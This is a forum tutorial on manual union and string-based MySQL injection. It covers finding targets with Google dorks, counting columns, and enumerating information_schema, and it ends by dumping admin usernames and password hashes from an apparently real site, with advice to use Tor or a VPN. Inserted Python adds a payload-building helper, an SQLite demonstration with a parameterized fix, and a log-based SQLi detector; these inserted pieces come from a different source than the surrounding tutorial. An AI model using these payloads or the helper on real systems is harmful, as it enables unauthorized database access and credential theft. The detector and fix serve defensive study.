[tut] Union SQL Injection and string injection (forcing an error)

Union SQL Injection and string injection (forcing an error)

This tutorial is for educational purposes only! Any misuse of my tutorials is at your own risk!

Hello, Evilzone. This is my tutorial on Union SQL injection and string injection (forcing an error). There are two methods in this tutorial: union-based injection and union-based string injection. There is only a small difference between them, which will be explained later in this tutorial.

Items we need, and things to take care of before we start.
Before you do anything, install the Tor browser or get a VPN, or use both, and read up on anti-forensics if you can. That is for your own protection.

Items we need:

Quote
1.  A text editor of your choice. (Pen and paper would take too long.)
2.  This is manual injection, so we want a good browser and helper tools: Firefox, for the HackBar add-on.
3.  A vulnerable site.
4.  Some fresh Coke and chips. (Some spare time.)

Things we will learn:

Quote
1.  Understanding what SQL injection is.
2.  Finding vulnerable websites (or finding vulnerabilities on one site).
3.  Gathering database information.
4.  Knowing and understanding every attack vector I use.
5.  Vectors to pull data out fast, and several values out of one column.
6.  Using hex to keep it all readable, to add your name, and more.
7.  Finding admin login pages.

Let the journey to SQL Injection begin!

If you run Firefox, install HackBar. It will ease your life in SQL injection and XSS for sure!
https://addons.mozilla.org/en-US/firefox/addon/hackbar/

If you don't use Firefox yet, here is the download page: http://www.mozilla.org/en-US/firefox/new/
If you do not want to use Firefox, that is fine with me; I am only suggesting easy-to-use tools.

1. Union SQL Injection.

What is SQL injection? SQL injection is an attack on web applications that build database queries out of user input without keeping the data separate from the SQL. It is not tied to one product: MySQL, MS SQL, PostgreSQL, Oracle and others are all affected when the application is written that way, so SQL injection is a wide subject to cover. It literally means injecting SQL statements through vulnerable entry points to the database, for example form inputs and URL parameters. I will explain how to check whether these are vulnerable later in the tutorial.
In this tutorial I will explain union injection (this is the basic one). What is UNION SELECT? UNION is an SQL operator that joins the result sets of two queries: the web application's own query and ours. Both queries must return the same number of columns, which is why we count columns first. Because of that we can SELECT whatever we like from the database and have the page display the result of our query.
In this tutorial I will only explain how to do SQL injection through URL parameters.

2. Finding vulnerable websites (or finding vulnerabilities on one site.)

Checking whether a link is vulnerable is actually easy. Finding a vulnerable one is mostly the problem.

First of all we need to find a vulnerable website. We have to look for a URL that takes input or has an id in it. Something like this should be at the end:
.php?id=1. It could also be a whole load of other things: .asp?id=, .php?id=AWORD and so on. Let's stick to .php?id=... because ASP sites most of the time use an MS SQL database.
UNION works there as well, but the details differ (comment style, version functions, system tables), and this tutorial covers MySQL only. Now, how to find vulnerable sites easily? There are scanners on the market, even free ones, though I like Google more.
I'll explain how to do it with Google and Google dorks.

It's quite simple, and you can use Google dorks to find about anything indexed by Google. You will be happy you learned how to use them.

How do Google dorks work?
In most cases we will use the inurl:"" dork. With this dork we can find most of the stuff we need.
Of course there are other useful dorks:

Google dorks:

Code: [Select]
intitle, intext, inurl, filetype, site, allinurl
There are more, but these are the useful ones for us. Interested in more? Look for "Google power commands". Google is a hacker's friend; if you want to know something, use it!

Now, how to use dorks. I'm going to explain the three most useful ones for SQL injection: one, inurl:; two, intext:; three, site:.

If you use inurl:".php?id=", Google will only show you sites with that in the URL, which makes finding vulnerable ones easy.
intext: searches the page body instead, so intext:"You have an error in your SQL syntax" finds pages that already show a MySQL error.
But of course we want to target specific sites rather than attacking random ones. How do we do that?

site:"www.site.com" inurl:"php?id=" will give you all results for site.com with php?id= in the URL.


Testing vulnerability:

Code: [Select]
http://www.[site].com/page.php?id=1
http://www.[site].com/page.php?id=1'  [look at the ' single quote.]

Screenshot: http://imageshack.us/a/img692/8929/vulntestm.png

If a MySQL error occurs, the page is most likely vulnerable to SQL injection: the quote broke the syntax of the query, which proves our input reaches the database as SQL and not as data. There are other kinds of SQL errors as well: MS SQL errors, MS Access errors, Microsoft JET errors.
I will cover the methods to inject those later. Pages whose content shifts or turns blank after the quote are possibly injectable too (some sites hide the error but the query still breaks), but let's first start with the basics, shall we?

Example of a MySQL error:

Code: [Select]
You have an error in your SQL syntax;
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

You can also see an error like that in the screenshot of the vulnerability test.
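To make the two ideas above concrete (what a lone quote does to an injectable query, and how a UNION rides along on the site's own SELECT), here is an added example that is not part of the original tutorial. It is a stand-alone Python script with a constructed in-memory SQLite database standing in for the site's database; the table and column names and the stored hash are made up, and page_vulnerable is the Python equivalent of a page.php that pastes id straight into its query. The fixed version beside it is what the site should have done.

```python
import sqlite3

# Constructed stand-in for the target's database (example data, not the
# site from the tutorial). SQLite ships with Python; the injection mechanics
# are the same as on MySQL, only the error texts differ.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'First post', 'editor');
CREATE TABLE users(id INTEGER, uname TEXT, passwd TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
""")


def page_vulnerable(id_param):
    """What page.php?id=... does on an injectable site: the raw parameter is
    glued into the SQL text, so whatever we type becomes part of the query."""
    sql = "SELECT id, title, body, author FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def page_safe(id_param):
    """The fix: the value travels separately from the query text as a bound
    parameter. The database treats it as data, never as SQL."""
    sql = "SELECT id, title, body, author FROM news WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


def probe_quote(page):
    """The tutorial's first test: append a single quote. A database error
    means our input is being parsed as SQL. Returns the error text, or
    None when the page survives the quote."""
    try:
        page("1'")
        return None
    except sqlite3.Error as exc:
        return str(exc)


if __name__ == "__main__":
    # Same column count as the news query (4); id -1 returns no real row,
    # so the UNION row is the first (and only) row the page renders.
    payload = "-1 UNION SELECT 1,uname,passwd,4 FROM users"
    print("quote probe, vulnerable:  ", probe_quote(page_vulnerable))
    print("quote probe, fixed:       ", probe_quote(page_safe))
    print("union payload, vulnerable:", page_vulnerable(payload))
    print("union payload, fixed:     ", page_safe(payload))
    print("normal request, fixed:    ", page_safe("1"))
```

Note what the fixed version does with the payload: the whole string "-1 UNION SELECT ..." is compared against the id column as one value, matches nothing and returns an empty result, while a normal id=1 still works. Prepared statements, not input filtering, are the fix for everything in this tutorial.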

3. Gathering database information.

The column count:

We need the column count to SQL inject our target successfully, because UNION only works when both SELECTs return the same number of columns. We get it with the ORDER BY method. It is actually very simple: you start with order by 1-- and the web page should still load fine. Then keep increasing that number until you get an error.
For example, if you hit order by 20 and get an error, you have to go down. If order by 15 gives no error, you have to go up. Keep increasing by one until you get the error; the last number without an error is the column count.

Example of ORDER BY:

Code: [Select]
http://www.[site].com/page.php?id=1+order+by+1-- [no error]
http://www.[site].com/page.php?id=1+order+by+100-- [no error]

Oops, no error on 100? That is intentional; I have to explain what string injection is.

Screenshots: http://imageshack.us/a/img89/4534/order1.png
http://imageshack.us/a/img28/9065/order100.png

Why do I do order by 100? No real page has 100 columns, so this tells us whether we need string injection.
If the parameter is used as a number in the query (WHERE id=1), our ORDER BY runs and 100 gives an error. If the parameter sits inside quotes (WHERE id='1'), everything we append is just part of the string and never runs, so nothing errors no matter what we type.
If you do not get an error with order+by+100--, we need to break out of the string and force an error.

How do we do this:

Code: [Select]
http://www.[site].com/page.php?id=1'+order+by+100--+-

I added a single quote behind the id number, which closes the string, and --+- at the end, which comments out the rest of the original query. Spaces are written as + in the URL. --+- decodes to "-- -": MySQL only treats -- as a comment when whitespace follows it, and the extra - keeps that whitespace from being trimmed off the end of the URL. Now our input executes as SQL instead of as a string, and we get an error above the number of columns we need.
Mine isn't really string injection; this was just to show you. I removed the tick and continued.

Code: [Select]
http://www.[site].com/page.php?id=1+order+by+1-- [no error]
http://www.[site].com/page.php?id=1+order+by+100-- [error]
http://www.[site].com/page.php?id=1+order+by+10-- [no error]
http://www.[site].com/page.php?id=1+order+by+15-- [no error]
http://www.[site].com/page.php?id=1+order+by+16-- [no error]
http://www.[site].com/page.php?id=1+order+by+17-- [error]

Screenshot: http://imageshack.us/a/img692/3384/columcount.png

At this point we know one important thing: this web page has 16 columns, because order by 17 gave the error "Unknown column '17' in 'order clause'"
and order+by+16-- gave no error. The last number without an error is the actual column count, which we need in our next step.

Union Select statement.

Union select is the basic SQL injection method, and also the most common one. UNION joins two queries, as explained before: the site's own query (the one that looks up the id) and ours, the queries we use to inject the web page. You will hear a lot about queries when you start learning SQL injection.

The union statement:

Code: [Select]
http://www.[site].com/page.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

For string injection: http://www.[site].com/page.php?id=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-

Screenshot: http://imageshack.us/a/img341/9457/unionselect.png

Now look at the content of the page, and at the source if you don't see any random numbers popping up.
If numbers show up, those are the columns the page displays: the ones we can put our queries in.

If nothing shows up, it is usually because the page only renders the first row, and that is still the site's own row for id=1. Putting a - before the id number (a negative id) makes the original query return nothing, so our UNION row becomes the first row and gets displayed. If - doesn't work, try null or 0 instead.
You can also use null in place of the numbers in the union statement. I'll explain the use of that in another tutorial.

As follows:
index.php?id=-1

For me a whole load of numbers showed up. That makes it easy, because I can inject more than one statement at a time. We now need the version of the MySQL server. If it is 5 or higher it is easy, because MySQL 5 introduced the information_schema database, which lists every table and column for us. On 4 or below it is a long workaround; I will explain version 4 and lower in one of my next tutorials.

Let's ask for version() in one of the vulnerable columns. I use column 11, as in the payload below.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16--

That is one way of finding the version. In some cases it might be blocked or not work. You can try this statement as well.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16--

Where the number 11 previously popped up, the version we requested will now show up.
We always want it to be 5.x.x or higher!
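The column-count search and the union payloads from the last two sections, as an added example that is not part of the original tutorial and not a tool from it: a small Python helper that does the ORDER BY search by binary search instead of one number at a time, builds the union payload for any column count and any choice of columns, and hex-encodes strings the way the later steps need. The 16-column page is simulated with a lambda, an assumption standing in for you watching the browser; the site name and payload layout are the tutorial's own.

```python
from typing import Callable, Dict


def find_column_count(errors: Callable[[int], bool], upper: int = 100) -> int:
    """ORDER BY column-count search.

    `errors(n)` must return True when the page errors on 'order by n' (in the
    tutorial that is you, looking at the browser). Going one by one works;
    this does a binary search between 1 and `upper`, which is what the jump
    to ORDER BY 100 already sets up: 1 must pass and `upper` must fail.
    """
    if errors(1):
        raise ValueError("order by 1 already errors: the page is not injectable here")
    if not errors(upper):
        raise ValueError(f"order by {upper} gives no error: the parameter is probably "
                         "quoted, break out with a ' (string injection)")
    lo, hi = 1, upper                      # invariant: lo passes, hi errors
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if errors(mid):
            hi = mid
        else:
            lo = mid
    return lo                              # last value that did not error


def hex_literal(text: str) -> str:
    """MySQL hex string literal: 'users' -> 0x7573657273. No quote characters
    needed, so it survives quote escaping on the way to the database."""
    return "0x" + text.encode().hex()


def union_payload(ncols: int, fields: Dict[int, str], id_value: str = "-1",
                  tail: str = "") -> str:
    """Build the id= value: placeholder numbers 1..ncols, with the columns in
    `fields` swapped for expressions, an optional FROM/WHERE tail, closed with
    '-- -' (MySQL ignores '--' unless whitespace follows it)."""
    cols = [fields.get(i, str(i)) for i in range(1, ncols + 1)]
    sql = f"{id_value} UNION SELECT {','.join(cols)}"
    if tail:
        sql += " " + tail
    return sql + " -- -"


def to_url(base: str, injected: str) -> str:
    """Spaces become + so the payload can be pasted into the address bar."""
    return base + injected.replace(" ", "+")


if __name__ == "__main__":
    # Constructed stand-in for the browser: pretend the page has 16 columns,
    # so 'order by n' errors exactly when n > 16.
    ncols = find_column_count(lambda n: n > 16)
    base = "http://www.[site].com/page.php?id="
    print(to_url(base, union_payload(ncols, {11: "version()"})))
    print(to_url(base, union_payload(
        ncols, {11: "group_concat(column_name)"},
        tail="from information_schema.columns where table_name="
             + hex_literal("users") + " and table_schema=database()")))
    # String-context variant: the leading quote closes the site's own string.
    print(to_url(base, union_payload(ncols, {11: "@@version"}, id_value="1'")))
```

The binary search relies on ORDER BY n failing for every n above the real count and passing for every n at or below it, which is true for a plain integer position; if a WAF or the application starts answering errors for other reasons, fall back to the one-by-one walk the tutorial uses.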

Let's say mine is 5.5.25-log. We also need a lot more. Because I have so many vulnerable columns I will show the database name together with the version in the image below.
If you have more than one vulnerable column you can make more than one thing show up at a time. You can even inject hex, and inside the hex HTML if you prefer,
for example to put a name or an image on the page. How? Simply replace a vulnerable column with 0x(HEX CODE), where (HEX CODE) is the text or HTML you want, converted to hex. For example, uSploit in hex is 7553706c6f6974, so the column becomes 0x7553706c6f6974; the 0x in front tells the database it is a hex literal, and MySQL shows it as the original text. You can convert with the HackBar or the swingnote website (google it). Let's get the database name.

Select database name:

You can simply add your query in another vulnerable column or edit the one you are already using:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,database(),15,16--

Sometimes there is more than one database. The same request with the other version function and group_concat() around database():

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,group_concat(database()),15,16--

Save the database name in Notepad; you will need it later in the tutorial.

database() only ever returns the one database the application is connected to. To list every database the account can see, use the following query. You won't be needing this a lot, but just in case:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12,13,14,15,16+from+information_schema.schemata--

Screenshot: http://img29.imageshack.us/img29/3575/versiondbhex.png

My database is called afa_db (no quotes). It pops up where my vulnerable column shows; you can see this in my screenshot.
Now let's get to some more sensitive data!
Now lets get to some more sensitive data!


Getting more information out of one column

It is possible to use group_concat() to drag out a lot of information at once, easing a hacker's life a lot!
How do we do that?

Code: [Select]
group_concat(version(),0x0A,database(),0x0A,user(),0x7553706c6f6974)

Let's unwrap that a bit. I ask for the version, then I use the hex 0x0A (a newline character) to separate version() from database(), and so on; otherwise it would be hard to tell what is what.
Then at the end there is 0x7553706c6f6974: the 0x tells the database it is hex, and the code is my name in hex. So next to the query my name pops up. Looks epic!

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(version(),0x0A,database(),0x0A,user(),0x7553706c6f6974),12,13,14,15,16--
Selecting the table names.

Stay tuned, it's getting more advanced here! As you are probably new to SQL injection this will be hard the first time. I advise not copy-pasting the queries but writing them out one by one.
That is and always will be the best way to learn.

Our query to get all the tables out of our database:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16+from+information_schema.tables+where+table_schema=database()--

Screenshot: http://imageshack.us/a/img716/7397/tablesi.png

Wow, that's a hell of a query! Let me clear it up for you:
group_concat() joins all the matching rows into one comma-separated string, but the result is cut off at group_concat_max_len, which is 1024 characters by default. We use it because there can be a hell of a lot of tables and columns, and this way we see them all at once in a single column.
So the query selects the table names from information_schema.tables (information_schema is a built-in database that describes every other database) where the table belongs to the current database. Yes, no more, no less. Loads of words for a small task.

What if you think not all tables showed up?
As I said, group_concat() is cut off at 1024 characters, and if there are more tables or columns than fit, we have to get the rest another way. To list every table you can go through them one by one using concat() and a LIMIT at the end of the query.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()+limit+0,1--+-

(This template is written for a 4-column page; use your own column count.) Keep increasing the first number in the LIMIT until no more tables come back:
0,1 | 1,1 | 2,1 | 3,1 | 4,1 | 5,1 | 6,1 | 7,1 | 8,1 | 9,1 | 10,1 | 11,1 and so on.

Now we have all our tables, so we should get the columns. But first we need to choose the table we want our columns from.
The list I can choose from: adverts,content,members,news,partners,users. In my case there were two candidates; I chose users over members and got it right. The admin is almost always in a user or admin table.

What to look for?
administrator(s), member(s)
user(s), admin(s)
tbladmin(s), tblmember(s)

Anything that relates to user logins or admin logins you should have a look into. Of course some hackers would also look for email addresses, passwords, or shopping details on shopping sites, and so on.
I chose the table users, so let's move on to extracting the column names from our table.

Extracting the column names.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16+from+information_schema.columns+where+table_name="users"--+-

Screenshot: http://imageshack.us/a/img248/632/magictouchhex.png

Take a close look at the query; it looks very similar to our previous one. You only need to change group_concat(table_name) to group_concat(column_name) and .tables to .columns.
At the end of the line, change table_schema=database() to table_name="users" (where it says users you have to put the table name you got before!).

If you get an error, that is not a bad thing; let's use some magic fingers to fix it: encode the table name in hex! The error usually means the application escapes or strips quote characters before they reach the query, so "users" never arrives intact. A hex literal needs no quotes at all, so it passes straight through.
http://www.swingnote.com/tools/texttohex.php, or go to Encoding in your HackBar and click on HEX. Choose the first format.

Screenshot: http://imageshack.us/a/img248/3444/columns.png

Where the website says "Hello to my little friend", I paste users.
Below, all the hex values will appear.

Choose this one: 7573657273 (users)
Add 0x before those numbers. That way the database knows it is hex and can translate it.

How to add it to the link: where you now have table_name="users"--
at the end of your link, change it to table_name=0x7573657273--

Our entire query would now be:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16+from+information_schema.columns+where+table_name=0x7573657273--

Now all the column names should show up where your vulnerable column is. Mine, as you can see in my screenshot, are: name,uname,passwd,content.
If several databases on the server have a table called users, their columns come back mixed together; add +and+table_schema=database() before the -- to be sure you only see your own.

Look for username and password, or whatever relates. I have uname and passwd in my list of columns.
I'll use those as an example. This is the interesting part, isn't it? Did I finally get your full attention?

We change group_concat(column_name) to group_concat(uname,0x3a,passwd). 0x3a is a colon in hex; we use it to separate the user from the password, so the result reads user:pass,user2:pass2. Without it, it would be a mess.

At the end of our query: +from+afa_db.users
afa_db is the database name we looked up at the start. users is the table name we found in the second part of this tutorial, the one we also selected our columns from.

Our next query:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(uname,0x3a,passwd),12,13,14,15,16+from+afa_db.users--

This time we do not need hex for the table name: here users is an identifier in the FROM clause, not a quoted string, so there are no quotes to escape.
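The whole ladder above (quote probe, ORDER BY, UNION with group_concat and hex) is just as visible from the other side of the connection. As an added example that is not part of the original tutorial, here is a small Python detector run over constructed Apache-style access log lines (made up for this example, not from any real server); the request paths replay the tutorial's own payloads so you can see what a defender keys on.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache "common" format lines (not from any real server). They
# replay the tutorial's probe ladder from one address, plus one normal visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2012:13:55:41 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2012:13:56:02 +0000] "GET /page.php?id=1+order+by+17-- HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2012:13:57:10 +0000] "GET /page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4870
203.0.113.7 - - [10/Oct/2012:13:58:33 +0000] "GET /page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16+from+information_schema.columns+where+table_name=0x7573657273-- HTTP/1.1" 200 4870
198.51.100.4 - - [10/Oct/2012:14:01:00 +0000] "GET /page.php?id=2 HTTP/1.1" 200 5133
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Matched against the URL-decoded, lower-cased query string, never the raw URL.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.{0,20}?\bselect\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "schema_enum": re.compile(r"information_schema\.(tables|columns|schemata)"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b"),
    "version_probe": re.compile(r"@@version|\bversion\s*\("),
    "comment_tail": re.compile(r"--\s*-?\s*$"),
}


def scan_log(text):
    """One finding per suspicious request: (ip, status, [indicator names])."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Undo '+' and %xx first; attackers encode, signatures must not care.
        query = unquote_plus(urlsplit(m["target"]).query).lower()
        hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if query.count("'") % 2 == 1:        # the lone-quote vulnerability test
            hits.append("unbalanced_quote")
        if hits:
            findings.append((m["ip"], int(m["status"]), hits))
    return findings


def attackers(findings, min_indicators=2):
    """Addresses that tripped several distinct indicators. One stray quote is
    a typo; the quote plus ORDER BY plus UNION from one IP is this tutorial."""
    by_ip = {}
    for ip, _status, hits in findings:
        by_ip.setdefault(ip, set()).update(hits)
    return {ip: sorted(h) for ip, h in by_ip.items() if len(h) >= min_indicators}


if __name__ == "__main__":
    for ip, status, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(hits)}")
    print(attackers(scan_log(SAMPLE_LOG)))
```

The 500 on the quote probe followed by ORDER BY and UNION requests from the same address is the fingerprint; the status codes matter as much as the patterns, because a page that answers 200 to a UNION with information_schema in it is one that rendered the attacker's row.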
Screenshot: http://imageshack.us/a/img26/3787/nameandpassmd5.png

I won't be explaining how to crack passwords. This is purely for educational purposes, not for causing harm.
If everything went well, you should now have the name and password. Of course, that was only basic union and string SQL injection.
There is a lot more to it; you will see loads of that in upcoming tutorials. Mine are:

Login: franchiseuk
Password: cb65... <- it's a real hash, look in the picture.

To find admin login pages use http://y-shahinzadeh.ir/af/; this site scans for many known admin page names. Or try to connect to the FTP.
Do not forget to use Tor or a VPN, or both, to do so.

Thanks for reading! Hope you enjoyed my tutorial.